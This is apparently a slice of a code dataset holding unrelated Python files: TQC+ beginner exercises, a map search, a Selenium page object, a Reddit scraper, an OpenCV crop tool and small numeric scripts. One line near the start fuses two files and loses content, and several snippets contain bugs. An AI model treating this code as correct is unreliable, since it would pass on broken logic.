mehadia)])\nmehadia.addNeighboors([(70, lugoj),(75, dobreta)])\ndobreta.addNeighboors([(75, mehadia),(120, craiova)])\ncraiova.addNeighboors([(120, dobreta),(146, vilcea),(138, pitesti)])\nvilcea.addNeighboors([(80, sibiu),(146, craiova),(97, pitesti)])\npitesti.addNeighboors([(97, vilcea),(138, craiova),(101, bucharest)])\nfagaras.addNeighboors([(99,sibiu),(211,bucharest)])\nbucharest.addNeighboors([(101, pitesti),(211, fagaras),(90, giurgiu),(85, urziceni)])\ngiurgiu.addNeighboors([(90, bucharest)])\nurziceni.addNeighboors([(85, bucharest),(98,hirsova),(142, vaslui)])\nhirsova.addNeighboors([(98, urziceni),(86, eforie)])\neforie.addNeighboors([(86, hirsova)])\nvaslui.addNeighboors([(142, urziceni),(92, iasi)])\niasi.addNeighboors([(92, vaslui),(87, neamt)])\nneamt.addNeighboors([(87,iasi)])\n\nclass State:\n def __init__(self, city, g, parent):\n self.parent = parent\n self.city = city\n self.g = g\n\n def __lt__(self, other):\n return self.g3d}{:>3d}{:>3d}'.format(ll[j],ll[j+1],ll[j+2]))\r\nprint(summ)\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 602 撲克牌總和\r\n請撰寫一程式,讓使用者輸入52張牌中的5張,計算並輸出其總和。\r\n提示:J、Q、K以及A分別代表11、12、13以及1。\r\n\r\n輸入說明\r\n5張牌數\r\n輸出說明\r\n5張牌的數值總和\r\n\r\n範例輸入\r\n5\r\n10\r\nK\r\n3\r\nA\r\n範例輸出\r\n32\r\n\"\"\"\r\nll=[]\r\nfor i in range(5):\r\n x=input()\r\n if x=='A':\r\n ll.append(1)\r\n elif x=='K':\r\n ll.append(13)\r\n elif x=='Q':\r\n ll.append(12)\r\n elif x=='J':\r\n ll.append(11)\r\n else:\r\n ll.append(int(x))\r\nprint(sum(ll))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 603 數字排序\r\n請撰寫一程式,要求使用者輸入十個數字並存放在串列中。\r\n接著由大到小的順序顯示最大的3個數字。\r\n\r\n輸入說明\r\n十個數字\r\n輸出說明\r\n由大到小排序,顯示最大的3個數字\r\n\r\n範例輸入1\r\n40\r\n32\r\n12\r\n29\r\n20\r\n19\r\n38\r\n48\r\n57\r\n44\r\n範例輸出1\r\n57 48 44\r\n\"\"\"\r\nll=[]\r\nfor i in range(10):\r\n x=int(input())\r\n ll.append(x)\r\nprint(sorted(ll)[-1],sorted(ll)[-2],sorted(ll)[-3])\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 604 
眾數\r\n請撰寫一程式,讓使用者輸入十個整數作為樣本數,\r\n輸出眾數(樣本中出現最多次的數字)及其出現的次數。\r\n提示:假設樣本中只有一個眾數。\r\n\r\n輸入說明\r\n十個整數\r\n輸出說明\r\n眾數\r\n眾數出現的次數\r\n\r\n範例輸入\r\n34\r\n18\r\n22\r\n32\r\n18\r\n29\r\n30\r\n38\r\n42\r\n18\r\n範例輸出\r\n18\r\n3\r\n\"\"\"\r\nimport numpy as np\r\n# ll=[34,18,22,32,18,29,30,38,42,18]\r\nll=[]\r\nfor i in range(10):\r\n x=int(input())\r\n ll.append(x)\r\n\r\nll2=list(np.unique(ll))\r\nll3=[]\r\nfor j in range(len(ll2)):\r\n ll3.append(ll.count(ll2[j]))\r\n\r\nprint(ll2[ll3.index(max(ll3))])\r\nprint(max(ll3))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 605 成績計算\r\n請撰寫一程式,讓使用者輸入十個成績,\r\n接下來將十個成績中最小和最大值(最小、最大值不重複)\r\n以外的成績作加總及平均,並輸出結果。\r\n\r\n提示:平均值輸出到小數點後第二位。\r\n\r\n輸入說明\r\n十個數字\r\n輸出說明\r\n總和\r\n平均\r\n\r\n範例輸入\r\n89\r\n78\r\n67\r\n80\r\n75\r\n98\r\n77\r\n89\r\n76\r\n60\r\n範例輸出\r\n631\r\n78.88\r\n\"\"\"\r\n#ll=[89,78,67,80,75,98,77,89,76,60]\r\nll=[]\r\nfor i in range(10):\r\n x=int(input())\r\n ll.append(x)\r\n\r\nmaxx=max(ll)\r\nminn=min(ll)\r\nll.remove(maxx)\r\nll.remove(minn)\r\nprint(sum(ll))\r\nprint('{:.2f}'.format(sum(ll)/len(ll)))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 606 二維串列行列數\r\n請撰寫一程式,讓使用者輸入兩個正整數rows、cols,\r\n分別表示二維串列lst 的「第一個維度大小」與「第二個維度大小」。\r\n串列元素[row][col]所儲存的數字,其規則為:\r\nrow、col 的交點值 = 第二個維度的索引col – 第一個維度的索引row。\r\n接著以該串列作為參數呼叫函式compute()輸出串列。\r\n\r\n提示:欄寬為4。\r\n\r\n輸入說明\r\n兩個正整數(rows、cols)\r\n輸出說明\r\n格式化輸出row、col的交點值\r\n\r\n範例輸入\r\n5\r\n10\r\n範例輸出\r\n 0 1 2 3 4 5 6 7 8 9\r\n -1 0 1 2 3 4 5 6 7 8\r\n -2 -1 0 1 2 3 4 5 6 7\r\n -3 -2 -1 0 1 2 3 4 5 6\r\n -4 -3 -2 -1 0 1 2 3 4 5\r\n\"\"\"\r\nroww=int(input())\r\ncoll=int(input())\r\n\r\ndef compute(row,col):\r\n for i in range(1,roww+1):\r\n for j in range(1,col+1):\r\n print('{:>4d}'.format(j-i),sep='',end='')\r\n print()\r\n\r\ncompute(roww,coll)\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 607 成績計算\r\n請撰寫一程式,讓使用者輸入三位學生各五筆成績,\r\n接著再計算並輸出每位學生的總分及平均分數。\r\n\r\n提示:平均分數輸出到小數點後第二位。\r\n\r\n輸入說明\r\n三位學生各五筆成績\r\n輸出說明\r\n格式化輸出每位學生的總分及平均分數\r\n\r\n輸入與輸出會交雜如下,輸出的部份以粗體字表示\r\nThe 1st student:\r\n78\r\n89\r\n88\r\n70\r\n60\r\nThe 2nd student:\r\n90\r\n78\r\n66\r\n68\r\n78\r\nThe 3rd student:\r\n69\r\n97\r\n70\r\n89\r\n90\r\nStudent 1\r\n#Sum 385\r\n#Average 77.00\r\nStudent 2\r\n#Sum 380\r\n#Average 76.00\r\nStudent 3\r\n#Sum 415\r\n#Average 83.00\r\n\"\"\"\r\nprint('The 1st student:')\r\nl1=[]\r\nfor i in range(5):\r\n l1.append(int(input()))\r\n\r\nprint('The 2nd student:')\r\nl2=[]\r\nfor i in range(5):\r\n l2.append(int(input()))\r\n\r\nprint('The 3rd student:')\r\nl3=[]\r\nfor i in range(5):\r\n l3.append(int(input()))\r\n\r\nimport numpy as np\r\n\r\nprint('Student 1')\r\nprint('#Sum {:d}'.format(sum(l1)))\r\nprint('#Average {:.2f}'.format(np.mean(l1)))\r\n\r\nprint('Student 2')\r\nprint('#Sum {:d}'.format(sum(l2)))\r\nprint('#Average {:.2f}'.format(np.mean(l2)))\r\n\r\nprint('Student 3')\r\nprint('#Sum {:d}'.format(sum(l3)))\r\nprint('#Average {:.2f}'.format(np.mean(l3)))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 608 最大最小值索引\r\n請撰寫一程式,讓使用者建立一個3*3的矩陣,\r\n其內容為從鍵盤輸入的整數(不重複),\r\n接著輸出矩陣最大值與最小值的索引。\r\n\r\n輸入說明\r\n九個整數\r\n輸出說明\r\n矩陣最大值及其索引\r\n矩陣最小值及其索引\r\n\r\n範例輸入\r\n6\r\n4\r\n8\r\n39\r\n12\r\n3\r\n-3\r\n49\r\n33\r\n範例輸出\r\nIndex of the largest number 49 is: (2, 1)\r\nIndex of the smallest number -3 is: (2, 0)\r\n\"\"\"\r\nll=[]\r\nfor i in range(9): ll.append(int(input()))\r\nprint('Index of the largest number {:d} is: ({:d}, {:d})'\r\n .format(max(ll), ll.index(max(ll))//3, ll.index(max(ll))%3))\r\n\r\nprint('Index of the smallest number {:d} is: ({:d}, {:d})'\r\n .format(min(ll), ll.index(min(ll))//3, ll.index(min(ll))%3))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 
609 矩陣相加\r\n請撰寫一程式,讓使用者建立兩個2*2的矩陣,\r\n其內容為從鍵盤輸入的整數,\r\n接著輸出這兩個矩陣的內容以及它們相加的結果。\r\n\r\n輸入說明\r\n兩個2*2矩陣,皆輸入整數\r\n輸出說明\r\n矩陣1的內容\r\n矩陣2的內容\r\n矩陣1及矩陣2相加的結果\r\n\r\n輸入與輸出會交雜如下\r\nEnter matrix 1:\r\n[1, 1]: 3\r\n[1, 2]: 5\r\n[2, 1]: 7\r\n[2, 2]: 5\r\nEnter matrix 2:\r\n[1, 1]: 6\r\n[1, 2]: 9\r\n[2, 1]: 8\r\n[2, 2]: 3\r\n\r\nMatrix 1:\r\n**3 5 **\r\n**7 5 **\r\nMatrix 2:\r\n**6 9 **\r\n**8 3 **\r\nSum of 2 matrices:\r\n**9 14 **\r\n**15 8 **\r\n\"\"\"\r\nla=[]\r\nprint('Enter matrix 1:')\r\nfor i in range(4): \r\n la.append(int(input('[{:d}, {:d}]: '\r\n .format((i//2)+1, (i%2)+1))))\r\n\r\nlb=[]\r\nprint('Enter matrix 2:')\r\nfor i in range(4): \r\n lb.append(int(input('[{:d}, {:d}]: '\r\n .format((i//2)+1, (i%2)+1))))\r\n\r\nlc=[]\r\nfor i in range(4): lc.append(la[i] + lb[i])\r\n\r\nprint('Matrix 1:\\n{} {} \\n{} {} '\r\n .format(la[0], la[1], la[2], la[3]))\r\nprint('Matrix 2:\\n{} {} \\n{} {} '\r\n .format(lb[0], lb[1], lb[2], lb[3]))\r\nprint('Sum of 2 matrices:\\n{} {} \\n{} {} '\r\n .format(lc[0], lc[1], lc[2], lc[3]))\r\n#%%\r\n\"\"\"\r\nTQC+ 程式語言Python 610 平均溫度\r\n請撰寫一程式,讓使用者輸入四週各三天的溫度,\r\n接著計算並輸出這四週的平均溫度及最高、最低溫度。\r\n\r\n提示1:平均溫度輸出到小數點後第二位。\r\n提示2:最高溫度及最低溫度的輸出,如為31時,\r\n 則輸出31,如為31.1時,則輸出31.1。\r\n\r\n輸入說明\r\n四週各三天的溫度\r\n輸出說明\r\n平均溫度\r\n最高溫度\r\n最低溫度\r\n\r\n輸入輸出範例\r\nWeek 1:\r\nDay 1:23.1\r\nDay 2:24\r\nDay 3:23.5\r\nWeek 2:\r\nDay 1:23.1\r\nDay 2:24\r\nDay 3:23.5\r\nWeek 3:\r\nDay 1:23.1\r\nDay 2:24\r\nDay 3:23.5\r\nWeek 4:\r\nDay 1:23.1\r\nDay 2:24\r\nDay 3:23.5\r\nAverage: 28.11\r\nHighest: 35.3\r\nLowest: 23.1\r\n\"\"\"\r\nimport numpy as np\r\nll=[]\r\nfor i in range(12):\r\n if i%3==0:\r\n print('Week {:d}:'.format((i//3)+1))\r\n ll.append(eval(input('Day {:d}:'.format((i%3)+1))))\r\n\r\nprint('Average: {:.2f}'.format(np.mean(ll)))\r\nprint('Highest:',max(ll))\r\nprint('Lowest:',min(ll))\r\n\r\n","sub_path":"pythonTQC+_ch6.py","file_name":"pythonTQC+_ch6.py","file_ext":"py","file_size_in_byte":8545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5972110","text":"#!/usr/bin/env python3\n\nimport math\n\nx = int(input())\n\ncount = 0\nvalue = 100\nwhile(1):\n # for i in range(100):\n count += 1\n value = math.floor(value*1.01)\n # print(value)\n if value >= x:\n break\nprint(count)\n","sub_path":"abc165/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344108448","text":"from selenium.webdriver.common.by import By\nfrom test_selenium.test_project.pages.basepage import BasePage\nfrom test_selenium.test_project.pages.contact_page import ContactPage\n\n\nclass AddMemberPage(BasePage):\n _username = (By.ID, \"username\")\n _cancel = (By.CSS_SELECTOR, \"[node-type='cancel']\")\n def add_member(self, name, acctid, memberAdd_phone):\n # find_element(By.ID, \"username\")\n self.find(*self._username).send_keys(name)\n self.find(By.ID, \"memberAdd_acctid\").send_keys(acctid)\n self.find(By.ID, \"memberAdd_phone\").send_keys(memberAdd_phone)\n # return self 是为了实现返回当前页面时依然可以实现链式调用\n # 相当于 别人调用是, add_member().save_member() 就等同于 self.save_member(self)\n return self\n\n def save_member(self):\n self.find(By.CSS_SELECTOR, \".js_btn_save\").click()\n return ContactPage(self.driver)\n\n def cancel_member(self):\n self.find(By.CSS_SELECTOR, \".js_btn_cancel\").click()\n self.wait_for_clickable(self._cancel)\n self.find(*self._cancel).click()\n return 
ContactPage(self.driver)\n\n\n\n","sub_path":"test_selenium/test_project/pages/add_member_page.py","file_name":"add_member_page.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189473750","text":"h = []\ne = []\nl = []\no = []\ncount = 1\nmax = 10000\n\nmsg = list(input())\nlgth = len(msg)\n\nfor i in range(lgth):\n\ta = msg[i]\n\tif a == \"h\":\n\t\th.append(i)\n\tif a == \"e\":\n\t\te.append(i)\n\tif a == \"l\":\n\t\tl.append(i)\n\tif a == \"o\":\n\t\to.append(i)\n\nif len(h) > 0:\n\thmin = min(h)\n\tmax = hmin\n\n\tfor i in e:\n\t\tif i > max:\n\t\t\tmax = i\n\t\t\tcount = count + 1\n\t\t\tbreak\n\n\tfor i in l:\n\t\tif i > max:\n\t\t\tmax = i\n\t\t\tcount = count + 1\n\t\t\ti = l.index(i)\n\t\t\tdel l[i]\n\t\t\tbreak\n\n\tfor i in l:\n\t\tif i > max:\n\t\t\tmax = i\n\t\t\tcount = count + 1\n\t\t\tbreak\n\n\tfor i in o:\n\t\tif i > max:\n\t\t\tcount = count + 1\n\t\t\tbreak\n\nif count == 5:\n\tprint(\"YES\")\nelse:\n\tprint(\"NO\")\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"295429300","text":"import random, time\nimport sys, os\n\nfrom CronosCoinecy import Database\nfrom CronosCoinecy import Request\n\nD = Database()\nR = Request()\n\n# 1 request per second maximum to the API\ndef getRedditInfo():\n    cursor = D.find('coins', { 'status': 'validated' })\n    infosThread = {}\n    \n    for coin in cursor:\n        if ('reddit' in coin):\n            payload = getInfoCoins(coin)\n            payload['coin_id'] = coin['_id']\n            D.insert_one('reddit_channels', payload)\n\n            print(\"{}: reddit infos have been updated\".format(coin['_id']))\n\n\ndef getInfoCoins(coin):\n    redditUrl = coin['reddit']\n    info = {}\n\n    votes, comments, topics = getTopics(redditUrl)\n\n    info = {\n        \"votes\": votes,\n        \"comments\": comments,\n        \"redditUrl\": redditUrl,\n        \"topics\": topics\n    }\n\n    return info\n\ndef getTopics(url, sumVotes = 0, sumComments = 0, sumTopics = 0):\n    print(\"- [{}] - {} votes, {} comments, {} topics\".format(url, sumVotes, sumComments, sumTopics))\n    time.sleep(random.random() * 2 + 4)\n    soup = R.web(url)\n\n    for link in soup.find_all(\"div\", {\"class\": \"link\"}):\n        votes = link.find(\"div\", {\"class\": \"midcol unvoted\"}).find(\"div\", {\"class\": \"score unvoted\"}).text\n        votes = votes.replace(\"•\", \"0\")\n\n        if 'k' in votes:\n            votes = float(votes.replace('k', '')) * 1000\n        elif 'm' in votes:\n            votes = float(votes.replace('m', '')) * 1000000\n\n        sumVotes += int(votes)\n\n        comments = link.find(\"ul\", {\"class\": \"buttons\"}).find(\"li\", {\"class\": \"first\"}).find(\"a\").text\n        comments = comments.replace(\" comments\", \"\").replace(\"comment\", \"\")\n        sumComments += int(comments) if (len(comments)) else 0\n\n        sumTopics += 1\n\n    nextButton = soup.find(\"span\", {\"class\": \"next-button\"})\n    if (nextButton):\n        nextButton = nextButton.find(\"a\")[\"href\"]\n        # continue accumulating the totals on the next page\n        return getTopics(nextButton, sumVotes, sumComments, sumTopics)\n\n    return sumVotes, sumComments, sumTopics\n\n\ntry:\n    getRedditInfo()\nexcept KeyboardInterrupt:\n    print(\"Keyboard interrupt, stopping...\")\n\n\n","sub_path":"reddit/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"280221978","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nimport matplotlib.pyplot as plt\r\n\r\ndef 
cropIM(imagepath, saveimagepath):\r\n\r\n img = cv2.imread(imagepath)\r\n img=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n img_copy=img.copy()\r\n drawing = False # True if mouse is pressed\r\n ix, iy = -1, -1\r\n outdir=saveimagepath\r\n # mouse callback function\r\n def draw_rectangle(event, x, y, flags, param):\r\n global ix, iy, drawing, mode\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n # When you click DOWN with left mouse button drawing is set to True\r\n drawing = True\r\n # Then we take note of where that mouse was located\r\n ix, iy = x, y\r\n\r\n elif event == cv2.EVENT_MOUSEMOVE:\r\n # Now the mouse is moving\r\n if drawing == True:\r\n\r\n # If drawing is True, it means you've already clicked on the left mouse button\r\n # We draw a rectangle from the previous position to the x,y where the mouse is\r\n img_copy1 = img_copy.copy()\r\n\r\n cv2.rectangle(img_copy1, (ix, iy), (x, y), (0, 255, 0), 3)\r\n\r\n\r\n elif event == cv2.EVENT_LBUTTONUP:\r\n # Once you lift the mouse button, drawing is False\r\n drawing = False\r\n # we complete the rectangle.\r\n cv2.rectangle(img_copy, (ix, iy), (x, y), (0, 255, 0), 3)\r\n # print(x,y)\r\n cv2.namedWindow(winname=\"Result\")\r\n roi = img[iy:y, ix:x]\r\n # blur = cv2.medianBlur(roi, n)\r\n # img[iy:y, ix:x, :] = blur\r\n cv2.imshow('Result', roi)\r\n\r\n elif event == cv2.EVENT_RBUTTONDOWN:\r\n if outdir is not None:\r\n roi = img[iy:y, ix:x]\r\n cv2.imwrite(outdir, roi)\r\n print(\"Successfully saved the result\")\r\n else:\r\n print(\"please provide the full path for saving the result\")\r\n\r\n # Create a black image\r\n # img = np.zeros((512, 512, 3), np.uint8)\r\n # This names the window so we can reference it\r\n cv2.namedWindow(winname='my_drawing')\r\n # cv2.namedWindow(winname='Result')\r\n # Connects the mouse button to our callback function\r\n cv2.setMouseCallback('my_drawing', draw_rectangle)\r\n cv2.setMouseCallback('Result', draw_rectangle)\r\n\r\n\r\n while True: # Runs forever until we break with Esc key on keyboard\r\n # Shows the image window\r\n cv2.imshow('my_drawing', img_copy)\r\n\r\n # CHECK TO SEE IF ESC WAS PRESSED ON KEYBOARD\r\n if cv2.waitKey(1) & 0xFF == 27:\r\n break\r\n cv2.destroyAllWindows()\r\n\r\n","sub_path":"imagefunctions/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522607907","text":"import os.path\r\nimport sys\r\n\r\ndef main():\r\n\r\n keywords = {\"and\": 0, \"as\": 0, \"assert\": 0, \"break\": 0, \"class\": 0,\r\n \"continue\": 0, \"def\": 0, \"del\": 0, \"elif\": 0, \"else\": 0,\r\n \"except\": 0, \"False\": 0, \"finally\": 0, \"for\": 0, \"from\": 0,\r\n \"global\": 0, \"if\": 0, \"import\": 0, \"in\": 0, \"is\": 0, \"lambda\": 0,\r\n \"None\": 0, \"nonlocal\": 0, \"not\": 0, \"or\": 0, \"pass\": 0, \"raise\": 0,\r\n \"return\": 0, \"True\": 0, \"try\": 0, \"while\": 0, \"with\": 0, \"yield\": 0}\r\n\r\n filename = input(\"Enter the filename: \").strip()\r\n\r\n if not os.path.isfile(filename):\r\n print(\"File\", filename, \"does not exist\")\r\n sys.exit()\r\n\r\n readfile = open(filename, \"r\")\r\n\r\n text = readfile.readlines()\r\n\r\n # for i in range(len(text)):\r\n\r\n for line in text:\r\n for word in line.split():\r\n if word in keywords:\r\n keywords[word] += 1\r\n\r\n for itm in keywords:\r\n print(itm, \":\", 
keywords[itm])\r\n\r\n\r\nmain()\r\n\r\n\r\n\r\n","sub_path":"14.3.py","file_name":"14.3.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"137381142","text":"# -*- coding: utf-8 -*-\n# from __future__ import division, absolute_import\n\n# Thanks to Neal Becker\n\nimport numpy as np\nfrom numba import *\nfrom numba.vectorize import vectorize\nfrom math import exp, log1p\n\n\n@vectorize([f8(f8,f8)])\ndef log_exp_sum2 (a, b):\n if a >= b:\n return a + (exp (-(a-b)))\n else:\n return b + (exp (-(b-a)))\n ## return max (a, b) + log1p (exp (-abs (a - b)))\n\n\n#@autojit\n@jit(f8[:,:] (f8[:,:]))\ndef log_exp_sum (u):\n s = u.shape[1] # Test wraparound when implemented!\n if s == 1:\n return u[...,0]\n elif s == 2:\n return log_exp_sum2 (u[...,0], u[...,1])\n else:\n return log_exp_sum2 (\n log_exp_sum (u[...,:s/2]),\n log_exp_sum (u[...,s/2:]))\n\n\nfrom timeit import timeit\nL = 1000\nN = 100\nu = np.tile (np.log (np.ones (L)/L), (N, 1))\n#v = log_exp_sum (u)\nfrom timeit import timeit\nprint(timeit(\n 'log_exp_sum(u)', 'from __main__ import u, log_exp_sum', number=50))\n","sub_path":"oldnumba/tests/issues/test_issue_185.py","file_name":"test_issue_185.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"255251296","text":"from pflacs import Premise\nbase = Premise(\"Base case\",\n parameters={\"a\":10,\"b\":5})\n#print(f\"base.a={base.a} base.b={base.b}\")\n\n\ndef adda(a, b, c=0):\n \"\"\"Add number b to number a. Optionally also add c.\n \"\"\"\n print(f\"«adda» w/args a={a} b={b}\", end=\"\")\n print(f\" c={c}\") if c else print()\n return a + b + c\n\nbase.plugin_func(adda) \n\n# result = base.adda()\n# print(f\"base.adda() result={result}\")\n\n# result = base.adda(b=-3)\n# print(f\"base.adda(b=-3) result={result}\")\n# result = base.adda(5, 4.2, -3)\n# print(f\"base.adda(5,4.2,-3) res={result}\")\n\n\ndef subx(x, y, z=0):\n \"\"\"Subtract number y from number x. 
Optionally also subract z.\n \"\"\"\n print(f\"«subx» w/args x={x} y={y}\", end=\"\")\n print(f\" z={z}\") if z else print()\n return x - y - z\n\nbase.plugin_func(subx, argmap={\"x\":\"a\",\n \"y\":\"b\", \"z\":\"c\"} )\nbase.add_param(\"c\", 6.5)\n# print(\"base.subx() =\", base.subx() )\n# print(\"base.subx(b=99) =\", base.subx(b=99) )\n\nlc1 = Premise(\"Load case 1\", parent=base,\n parameters={\"a\":100})\n# result = lc1.adda()\n# print(f\"lc1.adda() result={result}\")\n\nfrom pflacs import Calc\nlc1_sub = Calc(\"LC1 «subx()»\", lc1, funcname=\"subx\")\nlc1_sub(); print(lc1_sub._subx)\n#print(f\"lc1_sub() result={lc1_sub._subx}\")\n\nlc1_add = Calc(\"LC1 «adda()»\", lc1, funcname=\"adda\", \n argmap={\"return\":\"adda_res\"})\nlc1_add(); print(lc1_add.adda_res)\ndf = lc1_add.to_dataframe(); print(df)\n\nlc2 = base.add_child( lc1.copy() )\nlc2.name = \"Load case 2\"\nlc2.a = 200\nlc2_sub = lc2.get_child_by_name(\"LC1 «subx()»\")\nlc2_sub.name = \"LC2 «subx()»\"\nlc2_add = lc2.get_child_by_name(\"LC1 «adda()»\")\nlc2_add.name = \"LC2 «adda()»\"\n\n\ndef multk(k:\"a\", l:\"b\", m:\"c\" = 1) -> \"mult_res\":\n return k * l * m\nbase.plugin_func(multk)\nresult = base.multk()\nprint(f\"{base.a} * {base.b} * {base.c} = {result}\")\n\nlc3_mul = Calc(\"LC3 «multk()»\", base, funcname=\"multk\")\nimport numpy as np\nlc3_mul.b = np.linspace(0,10,3)\nlc3_mul()\nlc3_mul.to_dataframe()\n# print(f\"{lc3_mul.a}*{lc3_mul.b}*{lc3_mul.c}={lc3_mul.mult_res}\")\n\nfor _n in base:\n if type(_n) == Calc:\n _n()\n\nbase.savefile(\"simple_study.pflacs\")\n\nfor node in base:\n if type(node) == Calc:\n node.to_hdf5()\n\n","sub_path":"drafts/simple_pflacs.py","file_name":"simple_pflacs.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563642899","text":"#same class as Number_Advanced4.py, except using the error check function clled 'confirmInt' which has now been added to NumberCruncher.py\r\nimport NumberCruncher #using the class \"NumberCruncher\"\r\n\r\nvalidInput1 = int #THERE IS DEFINATELY A BETTER WAY TO DO THIS, SOME SORT OF \".CHECK()\" TOOLS IS MOST LIKELY AVAILABLE\r\nvalidInput2 = int #BUT FOR RIGHT NOW, COMPARE THIS TO \"Number_Advanced4.py\" TO WORK OUT WHY I HAD TO USE IT\r\n #I DON'T EVEN NEED TO DECLARE THEM HERE! I CAN JUST DECLARE LAETER BUT FOR THIS EXAMPLE,\r\n #GOOD TO HAVE THEM HERE SO WE CAN SEE WHAT THEY DO\r\n\r\nuserInput1 = (input(\"Enter your first number: \"))\r\nvalidAnswer = NumberCruncher.confirmInt(userInput1) #use my function 'NumberCruncher.checkInt' above to make sure it's a number\r\nwhile validAnswer == False: #Creates a while loop that follows the indented instruction below\r\n print(\"No.. that is not avalid entry\")\r\n userInput1 = (input(\"Enter your first number again: \"))\r\n validAnswer = NumberCruncher.confirmInt(userInput1) #this updates the validAnswer variable, eventually allowing us to break this loop\r\n # when the user enter an actual integer\r\nvalidInput1 = int(userInput1)\r\n\r\n\r\n\r\nuserInput2 = (input(\"Enter your second number: \"))\r\nvalidAnswer = NumberCruncher.confirmInt(userInput2) #use my function 'NumberCruncher.confirmInt' above to make sure it's a number\r\nwhile validAnswer == False: #Creates a while loop that follows the indented instruction below\r\n print(\"No.. 
# print(\"base.subx() =\", base.subx() )\n# print(\"base.subx(b=99) =\", base.subx(b=99) )\n\nlc1 = Premise(\"Load case 1\", parent=base,\n            parameters={\"a\":100})\n# result = lc1.adda()\n# print(f\"lc1.adda() result={result}\")\n\nfrom pflacs import Calc\nlc1_sub = Calc(\"LC1 «subx()»\", lc1, funcname=\"subx\")\nlc1_sub(); print(lc1_sub._subx)\n#print(f\"lc1_sub() result={lc1_sub._subx}\")\n\nlc1_add = Calc(\"LC1 «adda()»\", lc1, funcname=\"adda\", \n            argmap={\"return\":\"adda_res\"})\nlc1_add(); print(lc1_add.adda_res)\ndf = lc1_add.to_dataframe(); print(df)\n\nlc2 = base.add_child( lc1.copy() )\nlc2.name = \"Load case 2\"\nlc2.a = 200\nlc2_sub = lc2.get_child_by_name(\"LC1 «subx()»\")\nlc2_sub.name = \"LC2 «subx()»\"\nlc2_add = lc2.get_child_by_name(\"LC1 «adda()»\")\nlc2_add.name = \"LC2 «adda()»\"\n\n\ndef multk(k:\"a\", l:\"b\", m:\"c\" = 1) -> \"mult_res\":\n    return k * l * m\nbase.plugin_func(multk)\nresult = base.multk()\nprint(f\"{base.a} * {base.b} * {base.c} = {result}\")\n\nlc3_mul = Calc(\"LC3 «multk()»\", base, funcname=\"multk\")\nimport numpy as np\nlc3_mul.b = np.linspace(0,10,3)\nlc3_mul()\nlc3_mul.to_dataframe()\n# print(f\"{lc3_mul.a}*{lc3_mul.b}*{lc3_mul.c}={lc3_mul.mult_res}\")\n\nfor _n in base:\n    if type(_n) == Calc:\n        _n()\n\nbase.savefile(\"simple_study.pflacs\")\n\nfor node in base:\n    if type(node) == Calc:\n        node.to_hdf5()\n\n","sub_path":"drafts/simple_pflacs.py","file_name":"simple_pflacs.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563642899","text":"#same class as Number_Advanced4.py, except using the error check function called 'confirmInt' which has now been added to NumberCruncher.py\r\nimport NumberCruncher #using the class \"NumberCruncher\"\r\n\r\nvalidInput1 = int #THERE IS DEFINITELY A BETTER WAY TO DO THIS, SOME SORT OF \".CHECK()\" TOOL IS MOST LIKELY AVAILABLE\r\nvalidInput2 = int #BUT FOR RIGHT NOW, COMPARE THIS TO \"Number_Advanced4.py\" TO WORK OUT WHY I HAD TO USE IT\r\n                  #I DON'T EVEN NEED TO DECLARE THEM HERE! I CAN JUST DECLARE LATER, BUT FOR THIS EXAMPLE,\r\n                  #GOOD TO HAVE THEM HERE SO WE CAN SEE WHAT THEY DO\r\n\r\nuserInput1 = (input(\"Enter your first number: \"))\r\nvalidAnswer = NumberCruncher.confirmInt(userInput1) #use my function 'NumberCruncher.confirmInt' above to make sure it's a number\r\nwhile validAnswer == False: #Creates a while loop that follows the indented instruction below\r\n    print(\"No.. that is not a valid entry\")\r\n    userInput1 = (input(\"Enter your first number again: \"))\r\n    validAnswer = NumberCruncher.confirmInt(userInput1) #this updates the validAnswer variable, eventually allowing us to break this loop\r\n                                                        # when the user enters an actual integer\r\nvalidInput1 = int(userInput1)\r\n\r\n\r\n\r\nuserInput2 = (input(\"Enter your second number: \"))\r\nvalidAnswer = NumberCruncher.confirmInt(userInput2) #use my function 'NumberCruncher.confirmInt' above to make sure it's a number\r\nwhile validAnswer == False: #Creates a while loop that follows the indented instruction below\r\n    print(\"No.. that is not a valid entry\")\r\n    userInput2 = (input(\"Enter your second number again: \"))\r\n    validAnswer = NumberCruncher.confirmInt(userInput2) #this updates the validAnswer variable, eventually allowing us to break this loop\r\n                                                        # when the user enters an actual integer\r\nvalidInput2 = int(userInput2)\r\n\r\nprint(\"Your entries added together = 